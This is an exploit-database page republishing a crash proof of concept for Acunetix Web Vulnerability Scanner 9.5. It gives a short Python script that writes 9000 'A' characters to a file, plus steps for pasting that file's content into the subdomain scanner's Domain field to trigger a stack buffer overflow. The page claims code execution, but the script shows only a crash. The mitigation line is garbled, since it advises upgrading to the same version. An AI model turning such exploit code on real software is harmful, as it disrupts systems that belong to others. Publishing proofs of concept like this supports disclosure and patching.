header-logo
Suggest Exploit
vendor:
Web Vulnerability Scanner
by:
Hadi Zomorodi Monavar
7.8
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Web Vulnerability Scanner
Affected Version From: 9.5
Affected Version To: 9.5
Patch Exists: YES
Related CWE: N/A
CPE: a:acunetix:web_vulnerability_scanner
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7, Windows 8.1, Windows Vista
2020

Acunetix Web Vulnerability Scanner 9.5 – Crash Proof Of Concept

A buffer overflow vulnerability exists in Acunetix Web Vulnerability Scanner 9.5 when a maliciously crafted input is sent to the application. This can be exploited to cause a stack-based buffer overflow by sending an overly long string to the application when it is processing user-supplied input. This can result in arbitrary code execution.

Mitigation:

Upgrade to the latest version of Acunetix Web Vulnerability Scanner 9.5
Source

Exploit-DB raw data:

#!/usr/bin/env python
# Title : Acunetix Web Vulnerability Scanner 9.5 - Crash Proof Of Concept
# Website : https://www.acunetix.com
# Tested : win 7 / win 8.1 / win vista
#
#
# Author      :   Hadi Zomorodi Monavar
# Email       :   zomorodihadi@gmail.com
#
# 1 . run python code : python poc.py
# 2 . open hadi.txt and copy content to clipboard
# 3 . open "Acunetix Web Vulnerability Scanner 9.5"
# 4 . from Tools Explorer --> subdomain scanner
# 5 . Paste ClipBoard on "Domain"
# 6 . Click start
# 7 . Crashed ;)

crash = "\x41"*9000 #B0F
file = open("hadi.txt", "w")
file.write(crash)
file.close()

Navigation

Suggest Exploit

Services By CQR